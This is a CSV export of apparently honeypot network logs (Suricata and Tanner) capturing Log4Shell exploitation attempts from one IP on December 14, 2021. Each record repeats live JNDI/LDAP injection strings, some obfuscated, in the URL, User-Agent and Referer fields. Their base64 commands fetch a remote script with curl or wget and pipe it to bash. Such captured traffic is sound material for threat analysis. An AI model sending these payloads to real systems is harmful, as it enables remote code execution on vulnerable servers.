"2021-12-14T21:33:05.400Z",1,Zw3dun0B5e7x5EYnBAmp,"logstash-suricata-2021.12.14",,"_doc","41f5ce73-e4e6-402f-bd92-414128b3d431",5a16b4616656,"821eb7a4-bb66-44ba-8f2f-a12f3c9bbe10",5a16b4616656,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1010923859973009,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5a16b4616656,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49212517,,"{""timestamp"":""2021-12-14T21:33:05.400508+0000"",""flow_id"":1010923859973009,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":57098,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuMjIzLjUuMTM2OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTU5LjIyMy41LjEzNjo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",57098,,,,,,,,,,,,doubletomato,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:33:05.400508+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:32:04.375Z",1,"fqHcun0BCXMCNTQLHW_v","logstash-suricata-2021.12.14",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1733689542479617,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,23609855f490,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",27687616,,"{""timestamp"":""2021-12-14T21:32:04.375164+0000"",""flow_id"":1733689542479617,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":55844,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjI3LjEyMy45NDo4MDgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2NS4yMjcuMTIzLjk0OjgwODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",55844,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:32:04.375164+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:30:47.396Z",1,"_Qzbun0B5e7x5EYnAf69","logstash-suricata-2021.12.14",,"_doc","ae6baa6b-0d71-44b0-a208-574f60a18faf",5d60de9b3a83,"4bd08fd7-b333-41d4-9926-e7f75c77ff65",5d60de9b3a83,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2162718115611636,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5d60de9b3a83,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",7554,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",69122453,,"{""timestamp"":""2021-12-14T21:30:47.396415+0000"",""flow_id"":2162718115611636,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":52620,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",52620,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:30:47.396415+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:30:47.396Z",1,"_gzbun0B5e7x5EYnAf69","logstash-suricata-2021.12.14",,"_doc","ae6baa6b-0d71-44b0-a208-574f60a18faf",5d60de9b3a83,"4bd08fd7-b333-41d4-9926-e7f75c77ff65",5d60de9b3a83,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",52620,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (399)",22b7d884d99be8e15fc3b1b27008c681,"[]",7554,CLOSED,false,0,,,,,,,2162718115611636,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"172.16.0.42","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,5d60de9b3a83,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",7554,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",69123580,,"{""timestamp"":""2021-12-14T21:30:47.396415+0000"",""flow_id"":2162718115611636,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":52620,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7554},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (399)"",""gaps"":false,""state"":""CLOSED"",""md5"":""22b7d884d99be8e15fc3b1b27008c681"",""stored"":false,""size"":7554,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:30:47.396415+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:30:47.249Z",1,XKHaun0BCXMCNTQL9Wn7,"logstash-tanner-2021.12.14",,"_doc","ae6baa6b-0d71-44b0-a208-574f60a18faf",5d60de9b3a83,"4bd08fd7-b333-41d4-9926-e7f75c77ff65",5d60de9b3a83,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,5d60de9b3a83,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",82610,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""acbf0571-4787-47e5-b83c-4073d0837f91"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 52620}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""c06c3a4d-cfd7-4621-8f4b-5fba1213988b""}}}, ""timestamp"": ""2021-12-14T21:30:47.249475""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xNjguMjQyOjgwKXxiYXNo}",,,,,,,,,,,index,1,1,"0.6.0","c06c3a4d-cfd7-4621-8f4b-5fba1213988b","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",52620,,,,,,,,,200,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:30:47.249475",,,,,,,,,Tanner,,,"acbf0571-4787-47e5-b83c-4073d0837f91",
"2021-12-14T21:29:51.564Z",1,xqHaun0BCXMCNTQLH2Sx,"logstash-suricata-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1754412750986968,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,9efcf0b4b5ab,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49909125,,"{""timestamp"":""2021-12-14T21:29:51.564576+0000"",""flow_id"":1754412750986968,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":34106,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",34106,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:29:51.564576+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:29:51.564Z",1,x6Haun0BCXMCNTQLH2Sx,"logstash-suricata-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",34106,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (747)",f57e5b6f34eeacc1c32cb643fb59a98e,"[]",16240,CLOSED,false,0,,,,,,,1754412750986968,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,9efcf0b4b5ab,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49910223,,"{""timestamp"":""2021-12-14T21:29:51.564576+0000"",""flow_id"":1754412750986968,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":34106,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (747)"",""gaps"":false,""state"":""CLOSED"",""md5"":""f57e5b6f34eeacc1c32cb643fb59a98e"",""stored"":false,""size"":16240,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:29:51.564576+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:29:51.436Z",1,"E2_aun0B6VkG8jKzK8QQ","logstash-tanner-2021.12.14",,"_doc","dfa2c178-786c-4ced-bbbc-465e77ee293e",9efcf0b4b5ab,"95bde17c-aaff-4b19-aecb-c6aaa0dfa041",9efcf0b4b5ab,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjUuMjIuODQuMzk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY1LjIyLjg0LjM5OjgwKXxiYXNo}",,9efcf0b4b5ab,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",127248,,"{""method"": ""GET"", ""path"": 